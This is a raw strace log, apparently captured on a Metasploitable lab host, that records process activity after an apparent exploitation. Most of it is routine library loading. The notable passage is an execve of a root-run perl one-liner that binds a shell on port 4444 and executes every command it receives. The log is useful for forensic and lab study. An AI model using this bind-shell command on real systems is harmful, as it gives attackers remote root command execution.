13006 07:45:13.289882 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d83000

13006 07:45:13.289893 mmap2(0xb7d97000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d97000

13006 07:45:13.289909 mmap2(0xb7d99000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d99000

13006 07:45:13.289922 close(1)          = 0

13006 07:45:13.289948 munmap(0xb7f29000, 29913) = 0

13006 07:45:13.289966 open("/etc/ld.so.cache", O_RDONLY) = 1

13006 07:45:13.289978 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

13006 07:45:13.289995 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f29000

13006 07:45:13.290005 close(1)          = 0

13006 07:45:13.290015 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13006 07:45:13.290030 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

13006 07:45:13.290044 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

13006 07:45:13.290133 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

13006 07:45:13.290150 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d79000

13006 07:45:13.290162 mmap2(0xb7d81000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d81000

13006 07:45:13.290177 close(1)          = 0

13006 07:45:13.290190 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13006 07:45:13.290202 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

13006 07:45:13.290220 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

13006 07:45:13.290364 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

13006 07:45:13.290382 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6e000

13006 07:45:13.290394 mmap2(0xb7d77000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d77000

13006 07:45:13.290410 close(1)          = 0

13006 07:45:13.290431 munmap(0xb7f29000, 29913) = 0

13006 07:45:13.290447 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

13006 07:45:13.290461 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

13006 07:45:13.290473 _llseek(1, 0, [0], SEEK_CUR) = 0

13006 07:45:13.290485 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

13006 07:45:13.290501 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f30000

13006 07:45:13.290511 _llseek(1, 1624, [1624], SEEK_SET) = 0

13006 07:45:13.290526 munmap(0xb7f30000, 1624) = 0

13006 07:45:13.290536 close(1)          = 0

13006 07:45:13.290565 getpgrp()         = 3831

13006 07:45:13.290575 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

13006 07:45:13.290590 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

13006 07:45:13.290607 brk(0x8101000)    = 0x8101000

13006 07:45:13.290639 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13006 07:45:13.290653 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13006 07:45:13.290668 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13006 07:45:13.290705 brk(0x8102000)    = 0x8102000

13006 07:45:13.290731 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

13006 07:45:13.290759 stat64("/sbin/AB", 0xbfc632b8) = -1 ENOENT (No such file or directory)

13006 07:45:13.290772 stat64("/bin/AB", 0xbfc632b8) = -1 ENOENT (No such file or directory)

13006 07:45:13.290783 stat64("/usr/sbin/AB", 0xbfc632b8) = -1 ENOENT (No such file or directory)

13006 07:45:13.290795 stat64("/usr/bin/AB", 0xbfc632b8) = -1 ENOENT (No such file or directory)

13006 07:45:13.290808 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

13006 07:45:13.290823 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da46f8) = 13007

13007 07:45:13.290868 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13007 07:45:13.290884 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

13007 07:45:13.290898 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

13007 07:45:13.290910 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

13007 07:45:13.290925 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

13007 07:45:13.290941 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

13007 07:45:13.290954 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

13007 07:45:13.291011 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

13007 07:45:13.291025 --- SIGPIPE (Broken pipe) @ 0 (0) ---

13007 07:45:13.291090 exit_group(127)   = ?

13006 07:45:13.306776 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:45:13.306792 waitpid(13006,  <unfinished ...>

13006 07:45:13.306805 <... rt_sigprocmask resumed> NULL, 8) = 0

13006 07:45:13.306812 --- SIGCHLD (Child exited) @ 0 (0) ---

13006 07:45:13.306824 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 13007

13006 07:45:13.306839 waitpid(-1, 0xbfc62f38, WNOHANG) = -1 ECHILD (No child processes)

13006 07:45:13.306849 sigreturn()       = ? (mask now [])

13006 07:45:13.306871 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

13006 07:45:13.306886 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13006 07:45:13.306897 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

13006 07:45:13.306909 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

13006 07:45:13.306926 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13006 07:45:13.306937 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

13006 07:45:13.306971 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

13006 07:45:13.306990 stat64("/sbin/perl", 0xbfc632e8) = -1 ENOENT (No such file or directory)

13006 07:45:13.307003 stat64("/bin/perl", 0xbfc632e8) = -1 ENOENT (No such file or directory)

13006 07:45:13.307014 stat64("/usr/sbin/perl", 0xbfc632e8) = -1 ENOENT (No such file or directory)

13006 07:45:13.307026 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

13006 07:45:13.307044 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

13006 07:45:13.307068 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

13006 07:45:13.307082 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da46f8) = 13008

13008 07:45:13.307125 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13008 07:45:13.307141 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

13008 07:45:13.307154 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

13008 07:45:13.307166 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

13008 07:45:13.307181 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

13008 07:45:13.307196 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

13008 07:45:13.307209 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

13008 07:45:13.307242 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

13008 07:45:13.307375 brk(0)            = 0x8153000

13008 07:45:13.307395 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13008 07:45:13.307410 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f7f000

13008 07:45:13.307426 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

13008 07:45:13.307442 open("/etc/ld.so.cache", O_RDONLY) = 1

13008 07:45:13.307454 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

13008 07:45:13.307471 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f77000

13008 07:45:13.307482 close(1)          = 0

13008 07:45:13.307492 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13008 07:45:13.307507 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

13008 07:45:13.307521 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

13008 07:45:13.307617 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

13008 07:45:13.307635 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f73000

13008 07:45:13.307647 mmap2(0xb7f75000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f75000

13008 07:45:13.307663 close(1)          = 0

13008 07:45:13.307674 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13008 07:45:13.307688 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

13008 07:45:13.307702 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

13008 07:45:13.307799 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

13008 07:45:13.307818 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f4e000

13008 07:45:13.307830 mmap2(0xb7f71000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f71000

13008 07:45:13.307845 close(1)          = 0

13008 07:45:13.307857 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13008 07:45:13.307871 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

13008 07:45:13.307885 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

13008 07:45:13.307972 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

13008 07:45:13.307989 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f4d000

13008 07:45:13.308001 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f35000

13008 07:45:13.308012 mmap2(0xb7f49000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f49000

13008 07:45:13.308026 mmap2(0xb7f4b000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f4b000

13008 07:45:13.308043 close(1)          = 0

13008 07:45:13.308055 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13008 07:45:13.308068 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

13008 07:45:13.308082 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

13008 07:45:13.308171 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

13008 07:45:13.308189 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de6000

13008 07:45:13.308200 mmap2(0xb7f2f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f2f000

13008 07:45:13.308214 mmap2(0xb7f32000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f32000

13008 07:45:13.308228 close(1)          = 0

13008 07:45:13.308240 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13008 07:45:13.308271 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

13008 07:45:13.308289 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

13008 07:45:13.308379 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

13008 07:45:13.308396 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db4000

13008 07:45:13.308407 mmap2(0xb7dbd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dbd000

13008 07:45:13.308422 mmap2(0xb7dbf000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dbf000

13008 07:45:13.308436 close(1)          = 0

13008 07:45:13.308459 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db3000

13008 07:45:13.308472 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db38c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

13008 07:45:13.308530 mprotect(0xb7f2f000, 4096, PROT_READ) = 0

13008 07:45:13.308557 munmap(0xb7f77000, 29913) = 0

13008 07:45:13.308570 set_tid_address(0xb7db3908) = 13008

13008 07:45:13.308579 set_robust_list(0xb7db3910, 0xc) = 0

13008 07:45:13.308588 futex(0xbfdb4a50, 0x81 /* FUTEX_??? */, 1) = 0

13008 07:45:13.308602 rt_sigaction(SIGRTMIN, {0xb7f392c0, [], SA_SIGINFO}, NULL, 8) = 0

13008 07:45:13.308615 rt_sigaction(SIGRT_1, {0xb7f39340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

13008 07:45:13.308627 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

13008 07:45:13.308641 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

13008 07:45:13.308659 uname({sys="Linux", node="metasploitable", ...}) = 0

13008 07:45:13.308704 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

13008 07:45:13.308757 brk(0)            = 0x8153000

13008 07:45:13.308768 brk(0x8174000)    = 0x8174000

13008 07:45:13.308813 getuid32()        = 0

13008 07:45:13.308824 geteuid32()       = 0

13008 07:45:13.308833 getgid32()        = 0

13008 07:45:13.308841 getegid32()       = 0

13008 07:45:13.308879 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d92000

13008 07:45:13.308906 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

13008 07:45:13.308924 read(1, "\374\266\336\325", 4) = 4

13008 07:45:13.308941 close(1)          = 0

13008 07:45:13.308958 time(NULL)        = 1495626313

13008 07:45:13.308999 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfdb4720) = -1 ENOENT (No such file or directory)

13008 07:45:13.309017 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfdb4720) = -1 ENOENT (No such file or directory)

